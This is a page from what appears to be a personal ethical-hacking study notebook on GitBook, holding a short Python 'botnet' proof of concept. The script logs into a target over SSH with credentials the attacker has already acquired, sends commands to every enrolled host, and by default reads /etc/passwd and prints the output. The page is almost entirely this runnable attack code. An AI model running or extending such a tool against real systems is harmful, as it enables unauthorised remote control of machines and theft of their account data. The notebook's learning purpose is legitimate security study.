Cyber Security / Ethical Hacking
  • Prologue
  • CTF/OSCP Prep
    • Fundamentals
      • Linux
        • Basics
        • Bash Scripting
      • Windows
        • Basics
        • PowerShell
          • Scripting
        • CMD
      • Kali Survivor Skills
    • Information Gathering
      • Passive Recon
      • Active Recon
    • Enumeration
      • Common Ports
      • Vulnerability Analysis
    • Exploitation
      • Shells
  • Binary Exploitation / Exploit Development
    • Useful tools and techniques for Binary Exploitation
    • Shellcoders Handbook
      • Chapter 2 - Stack Overflows
        • Linux Buffer Overflow With Command Injection
        • Linux Buffer Overflow Without Shellcode
      • Chapter 3 - Shellcode
  • TryHackMe
    • Linux Fundamentals
      • Linux Challenges
      • RP: tmux
      • Common Linux Privesc
    • Advent of Cyber
      • Inventory Management
      • Arctic Forum
      • Evil Elf
      • Training
      • Ho-Ho-Hosint
      • Data Elf-iltration
      • Skilling Up
      • SUID Shenanigans
      • Requests
      • Metasploit-a-ho-ho-ho
      • Elf Applications
      • Elfcryption
      • Accumulate
      • Unknown Storage
    • Web Application Security
      • Web Fundamentals
      • Juice Shop
      • WebAppSec 101
    • Linux Privesc Playground
    • Intro to x86-64
    • Ninja Skills
    • CC: Radare2
    • Reversing ELF
    • Intro to Python
    • ToolsRus
  • Programming
    • Python
      • Simple TCP Port Scanner/ Banner Grabber
      • Botnet
      • Keylogger
      • Nmap Scanner
    • Golang
      • Execute Commands
      • MAC changer
      • TCP Port Scanner
      • TCP Port Scanner (improved with goroutines)
      • GoNmap Scanner
  • Protostar
    • Stack 0
    • Stack 1
    • Stack 2
  • Web App Pentesting
    • Recon
    • Authentication (Portswigger Academy)
      • Vulnerabilities in password-based login
        • Username Enumeration via different responses
        • Username enumeration via subtly different responses
        • Username enumeration via response timing
        • Broken brute-force protection, IP block
        • Username enumeration via account lock
        • Broken brute-force protection, multiple credentials per request
      • Vulnerabilities in multi-factor authentication
        • 2FA simple bypass
        • 2FA Broken Logic
        • 2FA bypass using a brute-force attack
      • Vulnerabilities in other authentication mechanisms
    • Broken Acess Controls
      • Insecure direct object references (IDOR)
        • Insecure direct object references lab
  • HackTheBox
    • Active
      • Untitled
      • Blunder
Powered by GitBook
On this page

Was this helpful?

  1. Programming
  2. Python

Botnet

Implementation of a botnet scritp (without command & control) just for POC

#!/usr/bin/env python3

'''
This is a POC of a very simple botnet, where after acquiring a target's credentials
the attacker connects through ssh and executes the command 'cat /etc/passwd' on the target's system.
Usage: python3 botnet.py -i IPaddress -u Username -p Password
'''

from pexpect import pxssh
import argparse

class Bot: # template for each bot we add to the botnet

    # initialize new client
    def __init__(self, host, user, password):
        self.host = host
        self.user = user
        self.password = password
        self.session = self.ssh()

    # secure shell into client/host
    def ssh(self):
        try:
            bot = pxssh.pxssh() # allows to connect to the host
            bot.login(self.host, self.user, self.password)
            return bot
        except Exception as e:
            print("Connection Failure.")
            print(e)

    # send command to client
    def send_command(self, cmd): # connect to the terminal and send command
        self.session.sendline(cmd)
        self.session.prompt()
        return self.session.before

# send a command to all bots in the botnet
def command_bots(command):
    for bot in botnet:
        attack = bot.send_command(command) # inputs coomand ('cat /etc/passwd')
        print(f"Output from {bot.host}") # prints host
        print(attack) # prints command output

# list of bots in botnet
botnet = []

# add a new bot to the botnet
def add_bot(host, user, password):
    new_bot = Bot(host, user, password)
    botnet.append(new_bot)

# get commandline arguments
def get_arguments():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", dest='host', help='type hostname or ip')
    parser.add_argument("-u", dest='user', help='type username')
    parser.add_argument("-p", dest='passwd', help='type password')
    options = parser.parse_args()
    host = options.host
    user = options.user
    password = options.passwd
    if host == None or user == None or password == None:
        parser.print_help()
        exit(0)
    add_bot(host, user, password)

get_arguments()

# list user home directory
command_bots('cat /etc/passwd')
PreviousSimple TCP Port Scanner/ Banner GrabberNextKeylogger

Last updated 5 years ago

Was this helpful?